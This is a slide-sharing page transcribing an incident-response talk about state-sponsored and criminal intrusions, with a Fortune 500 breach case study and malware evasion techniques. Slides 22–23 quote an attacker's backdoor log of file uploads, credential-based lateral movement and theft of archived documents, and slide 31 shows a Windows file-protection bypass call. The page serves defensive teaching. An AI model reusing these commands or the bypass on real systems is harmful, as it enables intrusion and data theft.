got spies in your wires agenda
play

GOT SPIES IN YOUR WIRES? Agenda 2 2 Introduction Meat and - PowerPoint PPT Presentation

Oct 03, 2022 •459 likes •948 views

Marshall Heilman GOT SPIES IN YOUR WIRES? Agenda 2 2 Introduction Meat and Potatoes Questions Introduction 3 3 Evolution of Cyber Attacks 4 - Technical Problem - Unix Systems -- 1998 - Servers - Attacks Were a Nuisance -

  1. Marshall Heilman GOT SPIES IN YOUR WIRES?

  2. Agenda 2 2  Introduction  Meat and Potatoes  Questions

  3. Introduction 3 3

  4. Evolution of Cyber Attacks 4 - Technical Problem - Unix Systems -- 1998 - Servers - Attacks Were a Nuisance - Non-organized - Technical/Business Problem - Windows Systems - Servers 1998 -- 2002 - Attacks Were About Money - Semi-Organized - Technical/Business/Legal Problem - Windows/Mac/Unix Systems - Client Systems / End Users (Phishing) 2002 -- Now - Attacks Are About Money - Attacks Are About Political Agenda - Highly-Organized

  5. Got Spies In Your Wires? 5 5

  6. So Does Everyone 6 6

  7. Types of Attackers 7 Malicious Opportunistic Insider State Organized Sponsored Crime

  8. Organization 8  Multiple groups responsible for specific activities Division of Labor  Militant  Money stolen from 100+ ATMs in 23 countries within Coordination a few hours  Bank account “topped up” as needed  Related data from multiple unrelated companies  Source address modification Real-time  Tools, tactics, and procedure changes Countermeasures  Massive exploitation  Malware enhancement

  9. Motivation 9  $9 million – one weekend, one financial institution Money  Faster technology cycles (mean time to production) Economic  Technological superiority  Bargaining power  Unfair competition  Information gap  Political statement or influence Political  Bribery  Embarrassment  National infrastructure Cyber  Power grid Warfare  Utilities  Communications

  10. Technology 10  Malware and applications Custom Tools  Tools built for specific jobs  Malware creation date within hours of compromise  Custom packed  $$$ Professional  Cutting edge anti-forensic techniques Grade Tools  Versioning  Multiple versions Change  Feature addition Management  Enhanced anti-forensic techniques  Anti-reverse engineering and forensics techniques Cutting Edge  VPN subversion Techniques  Multi-factor authentication bypass  Stealth techniques  Mathematical algorithm implementation

  11. 11 Case Study – Fortune 500 11

  12. Case Study 12 12  FBI Notified Firm − Three victims − Data loss  Background − Victim users - key players in foreign acquisition deal − Billions of dollars at stake − Large, disparate global network − > 60,000 systems − Decentralized and immature security posture

  13. Attack 13 13  Day 1: − Social engineering attack  Two users − Multiple backdoor variants & keystroke loggers uploaded − Malware installed − Network reconnaissance performed  Day 2: − Installed backdoors on five systems − Dumped cached/local passwords − More network reconnaissance performed

  14. Attack 14 14  Day 3: − Social engineering attack  Third user − Malware installed − Passwords dumped from Active Directory DC  Weeks 1 – 16: − Lateral infection of multiple systems − Consistent data exfiltration  Weekly email/attachments from three targeted users  Weekly email/attachments from six other users  All recently accessed documents  All documents written to during specified timeframe  Large amounts of data from specific file share servers

  15. Attack 15 15  Week 8: − Social engineering attack  Fourth user (no relation)  Accidental compromise (mail forwarding) − Malware installed − Brute force attack against multiple SQL servers (‘sa’ account) − SQL service account privileges leveraged for ‘xp_cmdshell’ execution − Local Administrator access gained − SQL database exfiltration

  16. Attack 16 16  Week 13: − FBI notified firm − Investigation started − Enterprise IR tools deployed − Enterprise network monitoring program started  Week 16: − Data corruption program initiated − Attacker responded within days  Modified TTPs: malware, encryption, protocols, and source locations

  17. Wrap Up 17 17  Comprehensive Scoping Of Incident Due To Enterprise Grade IR Tools  Network Monitoring Allowed For: − Traffic decryption − Attacker TTP modification discovery  Complete Domain Access  ~50 Compromised Systems  GBs Of Data Exfiltrated

  18. Breaking and Entering 18 18  Reconnaissance − Web site mirroring − Data mining − Social networks − Automated information gathering  Initial Exploitation − Social engineering − Web browser exploitation  XSS  JS − Application exploitation  SQL injection  Remote file includes

  19. Breaking and Entering 19 19

  20. Breaking and Entering 20 20

  21. Breaking and Entering 21 21  Privilege Escalation − Local admin rights − Findpass − Service exploitation  Lateral Movement − Pass-the-hash − Password cracking − Cached passwords − LM hashes − Kerberos attacks

  22. Breaking and Entering 22 22 2010-Jan-06 14:26:49.135158 66.66.66.66-80 -> 10.10.10.10-2431 Command: Upload file c:\windows\system32\is.exe 2010-Jan-06 14:26:59.954409 10.10.10.10-2431 -> 66.66.66.66-80 Starting Upload 2010-Jan-06 14:27:10.588093 66.66.66.66-80 -> 10.10.10.10-2431 Command: Upload file c:\windows\system32\advhelp.dll 2010-Jan-06 14:27:20.016782 10.10.10.10-2431 -> 66.66.66.66-80 Starting Upload 2010-Jan-06 14:27:39.866201 66.66.66.66-80 -> 10.10.10.10-2431 Command: Getting Debug Information 768 2010-Jan-06 14:27:40.079833 10.10.10.10-2431 -> 66.66.66.66-80 Debug Info Processed Successfully 2010-Jan-06 14:27:48.901423 66.66.66.66-80 -> 10.10.10.10-2431 Command: cmd.exe /c "is.exe -i -v2 c064cf64e1cd6c0380def43ad17ad9c5" 2010-Jan-06 14:28:18.164456 66.66.66.66-80 -> 10.10.10.10-2431 Command: net use \\SYSTEM2\ipc$ "123456789" /user:DOMAIN\compromised_account 2010-Jan-06 14:28:21.284463 10.10.10.10-2431 -> 66.66.66.66-80 The command completed successfully.

  23. Grand Theft 23 23 2010-Jan-06 15:23:46.848138 66.66.66.66-80 -> 10.10.10.10-2431 Command: makecab "\\SYSTEM1\c$\SENSITIVE\Report_2010.doc" c:\windows\system32\slo2.rar 2010-Jan-06 15:32:28.771605 66.66.66.66-80 -> 10.10.10.10-2431 Command: cmd.exe /c "copy \\SYSTEM1\c$\windows\system32\slo2.rar c:\windows\system32\" 2010-Jan-06 15:32:30.381552 66.66.66.66-80 -> 10.10.10.10-2431 Command: List Processes 2010-Jan-06 15:32:30.589835 10.10.10.10-2431 -> 66.66.66.66-80 0 [System Process] 0 2 ----- <SNIP> ----- 2010-Jan-06 15:33:21.837765 66.66.66.66-80 -> 10.10.10.10-2431 Command: Download file c:\windows\system32\slo2.rar 2010-Jan-06 15:52:17.705164 66.66.66.66-80 -> 10.10.10.10-2431 Command: Delete File c:\windows\system32\slo2.rar 2010-Jan-06 15:52:17.921531 10.10.10.10-2431 -> 66.66.66.66-80 Delete file successful

  24. How Does This Happen? 24 24 Intern al Web Management Compliance HIDS / HIPS Oversight Anti-virus Firewalls Software IDS / IPS Logging Installed Enabled Proxies Most Companies

  25. Incident Detections 25 Incident Detections Last Year (18) 12% 6% 35% Mandiant Government Internal Other 47% 25

  26. Malware Trends 26 MALWARE DETECTION APT MALWARE RATE BY A/V COMMUNICATION

  27. The Good Old Days Are Gone … 27

  28. Hiding In Network Traffic 28 28  Ability To Masquerade As Legitimate MSN Messenger Traffic − Traffic analysis confirmed traffic from legitimate MSN Messenger client − Communicates with Microsoft servers (Live or Hotmail) − Malware “chats” with attacker − Traffic is encrypted within MSN Messenger client traffic format − Capabilities: interactive reverse backdoor, file upload and download − Binary timestomped to match kernel32.dll

  29. Hiding In Network Traffic 29 29  Ability To Masquerade As Legitimate DNS Traffic − Tunnels data over UDP/53 via DNS queries − Data chunked into smaller size (avoids TCP problem) − Requires 4-way challenge/response − Supports remote command shell and exit commands only − Binary timestomped to match cmd.exe − Primitive

  30. Hiding In Plain Sight 30 30  DLL Registered For Persistence  Installed As Microsoft Word Addin − Loads whenever Microsoft Word is started  Executes Download Routine − Limited native capabilities  Traffic Disguised As Legitimate HTTP Traffic − Commands encrypted as HTML comments  Authenticating Proxy? No Problem! − Iexplore.exe code injection

  31. Blatant Disregard For System Files 31 31  Windows File Protection? No Problem!  Undocumented API In sfc_os.dll: ordinal 5: SFCFileException − Disables SFC for 1 minute, allowing specified file to be modified SetSfcFileException(0, L"c:\\windows\\hh.exe",-1);  Binary To Modify Specified On Cmdline  Malware Injects Cmd Into Winlogon.exe (Necessary To Call Function)

Download Presentation
Download Policy: The content available on the website is offered to you 'AS IS' for your personal information and use only. It cannot be commercialized, licensed, or distributed on other websites without prior consent from the author. To download a presentation, simply click this link. If you encounter any difficulties during the download process, it's possible that the publisher has removed the file from their server.

Recommend

Wires Within Wires A Minimal Model for Computational Bioelectronic Peptide Design R. A. Mansbach 1

Wires Within Wires A Minimal Model for Computational Bioelectronic Peptide Design R. A. Mansbach 1

Wires Within Wires A Minimal Model for Computational Bioelectronic Peptide Design R. A. Mansbach 1 A. L. Ferguson 2 1 Physics Department 2 Materials Science Department University of Illinois at Urbana-Champaign Blue Waters Symposium, Sunriver,

603 views • 35 slides
What is Wires-X Yaesus Definition: WIRES (Wide-coverage Internet Repeater Enhancement

What is Wires-X Yaesus Definition: WIRES (Wide-coverage Internet Repeater Enhancement

What is Wires-X Yaesus Definition: WIRES (Wide-coverage Internet Repeater Enhancement System) is an Internet communication system which expands the range of amateur radio communication. For WIRES-X, an amateur node station connecting to

562 views • 27 slides
Primary Application of Inconel, Nickel Alloy Welding Wires What t is Incone onel, l, Nickel el

Primary Application of Inconel, Nickel Alloy Welding Wires What t is Incone onel, l, Nickel el

Primary Application of Inconel, Nickel Alloy Welding Wires What t is Incone onel, l, Nickel el Allo loy y Weld ldin ing Wires? s? In the world, there are many grade of welding wires according to their chemical compositions. But,

336 views • 9 slides
Joshua 2:1 Then Joshua son of Nun sent two men secretly from Shittim as spies, saying, Go,

Joshua 2:1 Then Joshua son of Nun sent two men secretly from Shittim as spies, saying, Go,

Joshua 2:1 Then Joshua son of Nun sent two men secretly from Shittim as spies, saying, Go, view the land, especially Jericho. Joshua 2:1 So they went, and entered the house of a prostitute whose name was Rahab, and spent the night

480 views • 14 slides
y I i Expensive to build a network that covers everything Why Wires costmoney Need land Civil

y I i Expensive to build a network that covers everything Why Wires costmoney Need land Civil

i Interdomain Routing y I i Expensive to build a network that covers everything Why Wires costmoney Need land Civil Engineering for layingdown wires have different requirements People How to connect 1960 Physical connectivity St IX

245 views • 6 slides
Joshua 2:1-7 Joshua the son of Nun sent out of Shittim two men as spies secretly, saying, Go, view

Joshua 2:1-7 Joshua the son of Nun sent out of Shittim two men as spies secretly, saying, Go, view

Speaking A Lie In Love ? Is it ever the will of God for Christians to lie? Joshua 2:1-7 Joshua the son of Nun sent out of Shittim two men as spies secretly, saying, Go, view the land, and Jericho. They went and came into the house of a prostitute

1.1k views • 64 slides
wires carry equal currents in the same direction, as shown. The diagrams show end views of the

wires carry equal currents in the same direction, as shown. The diagrams show end views of the

Two very long, parallel conducting wires carry equal currents in the same direction, as shown. The diagrams show end views of the wires and the magnetic force vectors due to current flow. Which diagram best represents the direction of the

414 views • 13 slides
Revolutionaries and Spies Daniel W. Cranston Virginia Commonwealth University dcranston@vcu.edu

Revolutionaries and Spies Daniel W. Cranston Virginia Commonwealth University dcranston@vcu.edu

Revolutionaries and Spies Daniel W. Cranston Virginia Commonwealth University dcranston@vcu.edu Slides available on my preprint page Joint with Jane Butterfield, Greg Puleo, Cliff Smyth, Doug West, and Reza Zamani LSU Combinatorics Seminar 6

760 views • 75 slides
Revolutionaries and Spies on Graphs Daniel W. Cranston Virginia Commonwealth University

Revolutionaries and Spies on Graphs Daniel W. Cranston Virginia Commonwealth University

Revolutionaries and Spies on Graphs Daniel W. Cranston Virginia Commonwealth University dcranston@vcu.edu Slides available on my webpage Joint with Jane Butterfield, Greg Puleo, Doug West, and Reza Zamani NIST ACMD Seminar 12 March 2013 A

826 views • 65 slides
Removing the MAC Retransmission Times from the RTT in TCP E. Dedu , S. Linck, F. Spies

Removing the MAC Retransmission Times from the RTT in TCP E. Dedu , S. Linck, F. Spies

Removing the MAC Retransmission Times from the RTT in TCP E. Dedu , S. Linck, F. Spies Laboratoire d'Informatique de l'Universit de Franche-Comt (LIFC) Montbliard, France Euromedia'2005 Toulouse, France 11 April 2005 Problem: RTT

331 views • 14 slides
Revolutionaries and Spies II: Hypercubes &amp; Complete Multipartite Graphs Douglas B. West

Revolutionaries and Spies II: Hypercubes &amp; Complete Multipartite Graphs Douglas B. West

Revolutionaries and Spies II: Hypercubes &amp; Complete Multipartite Graphs Douglas B. West Department of Mathematics University of Illinois at Urbana-Champaign west@math.uiuc.edu slides available on DBW preprint page Joint work with Jane V.

1.01k views • 83 slides
WIring Robotic SystEm for Switchgears www-lar.deis.unibo.it/people/gpalli/WIRES / Prof. Gianluca

WIring Robotic SystEm for Switchgears www-lar.deis.unibo.it/people/gpalli/WIRES / Prof. Gianluca

The European Coordination Hub for Open Robotics Development WIRES WIring Robotic SystEm for Switchgears www-lar.deis.unibo.it/people/gpalli/WIRES / Prof. Gianluca Palli Universit di Bologna (coordinator) ECHORD++ Final Review Meeting

3.08k views • 8 slides
Historic Events on 9 th of Av 12 Spies return from Canaan, 10 with a Bad Report 1491 BC 1st

Historic Events on 9 th of Av 12 Spies return from Canaan, 10 with a Bad Report 1491 BC 1st

Historic Events on 9 th of Av 12 Spies return from Canaan, 10 with a Bad Report 1491 BC 1st Temple Destroyed by Nebuchadnezar 586 BC 2nd Temple Destroyed by Titus Legions 70 AD Bar Kochvah Revolt was Crushed 132 Rome Plowed &amp; Salted

302 views • 13 slides
Undecidability of Higher-Order Unification Formalised in Coq Simon Spies, Yannick Forster 20

Undecidability of Higher-Order Unification Formalised in Coq Simon Spies, Yannick Forster 20

Undecidability of Higher-Order Unification Formalised in Coq Simon Spies, Yannick Forster 20 January 2020 CPP20 saarland university computer science Definition Undecidability Fragments Discussion Extending the Coq Library of

985 views • 54 slides
Long wires and asynchronous control R. Ho, J. Gainsley, R. Drost Funded by DARPA contract Sun

Long wires and asynchronous control R. Ho, J. Gainsley, R. Drost Funded by DARPA contract Sun

Long wires and asynchronous control R. Ho, J. Gainsley, R. Drost Funded by DARPA contract Sun Microsystems Laboratories NBCH30390002 1 SML2004-0323 Public Information SML2004-0323 How do on-chip wires scale? Are they really as bad as

671 views • 31 slides
Espionage in WWII: Operation Jedburgh Pre-WWII Spies - Pre WWII, espionage apparatus =

Espionage in WWII: Operation Jedburgh Pre-WWII Spies - Pre WWII, espionage apparatus =

Espionage in WWII: Operation Jedburgh Pre-WWII Spies - Pre WWII, espionage apparatus = primitive and weak - G-2 / ONI - FDR creates COI http://showblogs.syfy.com/caprican/opinion/corporate-espionage-is-it-going- too-far.php - FDR chooses

129 views • 11 slides
Participant Manual August 2017 Pre-CERCLA Screening Training Pre-CERCLA Screening Course 1

Participant Manual August 2017 Pre-CERCLA Screening Training Pre-CERCLA Screening Course 1

Pre-CERCLA Screening Training Participant Manual August 2017 Pre-CERCLA Screening Training Pre-CERCLA Screening Course 1 Course Objectives After taking this course, participants will be able to explain: What a Pre-CERCLA Screening

1.02k views • 57 slides
BREAKING AND ENTERING: EMULATING THE DIGITAL ADVERSARY IN 2019 Bobby Thompson National

BREAKING AND ENTERING: EMULATING THE DIGITAL ADVERSARY IN 2019 Bobby Thompson National

C I S A | C Y B E R S E C U R I T Y A N D I N F R A S T R U C T U R E S E C U R I T Y A G E N C Y BREAKING AND ENTERING: EMULATING THE DIGITAL ADVERSARY IN 2019 Bobby Thompson National Cybersecurity Assessments and Technical Services

522 views • 27 slides
3) Intrusion Tests Red Team approach Emmanuel Benoist Spring Term 2016 Berner Fachhochschule |

3) Intrusion Tests Red Team approach Emmanuel Benoist Spring Term 2016 Berner Fachhochschule |

3) Intrusion Tests Red Team approach Emmanuel Benoist Spring Term 2016 Berner Fachhochschule | Haute cole spcialise bernoise | Berne University of Applied Sciences 1 Table of Contents Presentation Example of a Red Team Mission

728 views • 46 slides
mami Plane 1 In the beginning there was ping , and it was good. (still the only

mami Plane 1 In the beginning there was ping , and it was good. (still the only

Platforms and Tools for Internet Measurement: Current and Future Developments Brian Trammell IRTF/ISOC Workshop on Research and Applications of Internet Measurements Yokohama, Japan, 31 October 2015 mami Plane 1 In the beginning

683 views • 32 slides
StratCom in Context: The Hidden Architecture of U.S. Militarism Jacqueline Cabasso Western

StratCom in Context: The Hidden Architecture of U.S. Militarism Jacqueline Cabasso Western

Slide 1 StratCom in Context: The Hidden Architecture of U.S. Militarism Jacqueline Cabasso Western States Legal Foundation April 12, 2008 Presented at the 16 th Annual Space Organizing Conference Global Network Against Weapons &amp; Nuclear

419 views • 18 slides
Survey of Cyber Moving Targets Presented By Sharani Sankaran Moving Target Defense A cyber

Survey of Cyber Moving Targets Presented By Sharani Sankaran Moving Target Defense A cyber

Survey of Cyber Moving Targets Presented By Sharani Sankaran Moving Target Defense A cyber moving target technique refers to any technique that attempts to defend a system and increase the complexity of cyber attacks by making the system

728 views • 27 slides
SSL, GONE IN 30 SECONDS b r e a c h A BREACH beyond CRIME SSL, GONE IN 30 SECONDS PREVIOUSLY...

SSL, GONE IN 30 SECONDS b r e a c h A BREACH beyond CRIME SSL, GONE IN 30 SECONDS PREVIOUSLY...

Angelo Prado Neal Harris Yoel Gluck SSL, GONE IN 30 SECONDS b r e a c h A BREACH beyond CRIME SSL, GONE IN 30 SECONDS PREVIOUSLY... CRIME Target Requirements Presented at Secrets in HTTP TLS compression ekoparty 2012 headers MITM A

553 views • 29 slides
Network Security Today: Finding Complex Attacks at 100Gb/s Robin Sommer International Computer

Network Security Today: Finding Complex Attacks at 100Gb/s Robin Sommer International Computer

Network Security Today: Finding Complex Attacks at 100Gb/s Robin Sommer International Computer Science Institute, &amp; Lawrence Berkeley National Laboratory robin@icsi.berkeley.edu http://www.icir.org/robin TU Mnchen, September 2012

1.27k views • 92 slides

More recommend